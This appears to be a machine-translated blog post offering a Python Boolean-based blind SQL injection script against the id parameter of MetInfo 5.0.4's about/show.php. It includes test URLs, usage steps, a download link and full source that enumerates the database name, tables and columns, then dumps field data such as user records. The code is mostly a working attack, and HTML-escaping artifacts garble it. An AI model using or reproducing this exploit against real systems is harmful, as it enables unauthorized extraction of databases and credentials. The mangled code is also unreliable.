metinfo_5.0.4 Boolean blind injection script
Network disk link
Extraction code: dx2o
Boolean blind injection judgment basis
successful request
http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn &id=22 and 1=1
failed request
http://10.9.47.148/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and 1=2
Using blind injection script
Startup script
python metinfo_booleanBasedBlind.py
Explode database name and table name
Enter the target IP and automatically blast the current database name and table name of the current database (the prerequisite is that metinfo must be in the www root directory of the target host, directly http://10.9.47.148/metinfo_5.0.4 to access the metinfo web page)
Exploding fields in tables
Enter the name of the table to be exploded
Exploding data in fields
Enter the field to blast
Decoding
Source code
import string
import requests
import binascii
################################################ ################################################ ########
# Define character set #
################################################ ################################################ ########
try:
# Define character set
strings = string.digits + string.ascii_letters + '_'
str = []
for i in strings:
str.append(i)
ip=input("Input target ip:")
################################################ ################################################ ########
# Explode database length #
################################################ ################################################ ########
database_length=0
for i in range(1,30):
url = f"http://{<!-- -->ip}/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and length(database())={<! -- -->i}"
res = requests.get(url=url)
if res.status_code == 200:
database_length=i
break
print(f"The length of the database name is {<!-- -->i} bits")
database_length=i
print("************************************************ *************************************************** ***")
################################################ ################################################ ########
# Explode database name #
################################################ ################################################ ########
database_name=""
print("Current database:")
for i in range(1,database_length + 1):
# Traverse alphanumeric underscores per bit
for j in str:
# Perform ascii transcoding
url = f"http://{<!-- -->ip}/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and ascii(substr(database(),{< !-- -->i},1))={<!-- -->ord(j)}"
res = requests.get(url=url)
if res.status_code == 200:
print(j,end="")
break
print()
print("************************************************ *************************************************** ***")
################################################ ################################################ #########
# Explosion table name #
################################################ ################################################ ########
print("Explosion table name")
for i in range(0,600):
#flag is used to avoid unnecessary blasting after each table has been blasted.
flag=0
# end is used to avoid unnecessary blasting after blasting the table.
end=0
print(f"[{<!-- -->i + 1}]", end="")
# Assume that the table name of each table can be up to 30 characters long, and each table name is queried in bits.
for j in range(1,30):
for name_str in str:
url = f"http://{<!-- -->ip}/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and ascii(substr((select table_name from information_schema. tables where table_schema = database() limit {<!-- -->i},1),{<!-- -->j},1))={<!-- -->ord(name_str)} "
res = requests.get(url=url)
if res.status_code == 200:
print(name_str,end="")
# The table name is not empty (the maximum number of tables has not been reached)
end=1
break
elif name_str=='_':
flag=1
break
# Jump out if the table length is exceeded, jump out of the loop
if flag==1:
break
# The number of exploded data tables exceeds the maximum number and breaks out of the loop
if end==0:
break
print()
################################################ ################################################ #########
# Explode field name #
################################################ ################################################ ########
print("************************************************ *************************************************** ***")
table_name=input("Enter the name of the table to be blasted:")
table=table_name
table_name="0x" + binascii.hexlify(table_name.encode()).decode()
#Run the 0-100 fields
for i in range(0,100):
print([i + 1],end="")
end=0
# Assume that the field name of each table can be up to 30 characters, and each field name is queried in bits.
for j in range(1,30):
flag = 0
for name_str in str:
url = f"http://{<!-- -->ip}/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and ascii(substr((select column_name from information_schema. columns where table_schema = database() and table_name={<!-- -->table_name} limit {<!-- -->i},1),{<!-- -->j},1))= {<!-- -->ord(name_str)}"
res = requests.get(url=url)
if res.status_code == 200:
end=1
flag=1
print(name_str,end="")
break
# If the field length is exceeded, break out of the loop and start blasting the next field.
if flag==0:
break
print()
if end==0:
break
################################################ ################################################ #########
# Explode field data #
################################################ ################################################ ########
print("************************************************ *************************************************** ***")
column=input("Enter the field to be blasted:")
#Run the 0-100th username
for i in range(0,100):
end=0
# Assume that each user's table name can be up to 100 characters long, and each user name is queried bit by bit.
for j in range(1,100):
flag=0
for name_str in str:
url = f"http://{<!-- -->ip}/metinfo_5.0.4/about/show.php?lang=cn & amp;id=22 and ascii(substr((select {<!- - -->column} from {<!-- -->table} limit {<!-- -->i},1),{<!-- -->j},1))={<! -- -->ord(name_str)}"
res = requests.get(url=url)
if res.status_code == 200:
end=1
flag=1
print(name_str,end="")
break
if flag==0:
break
print()
if end==0:
break
except:
pass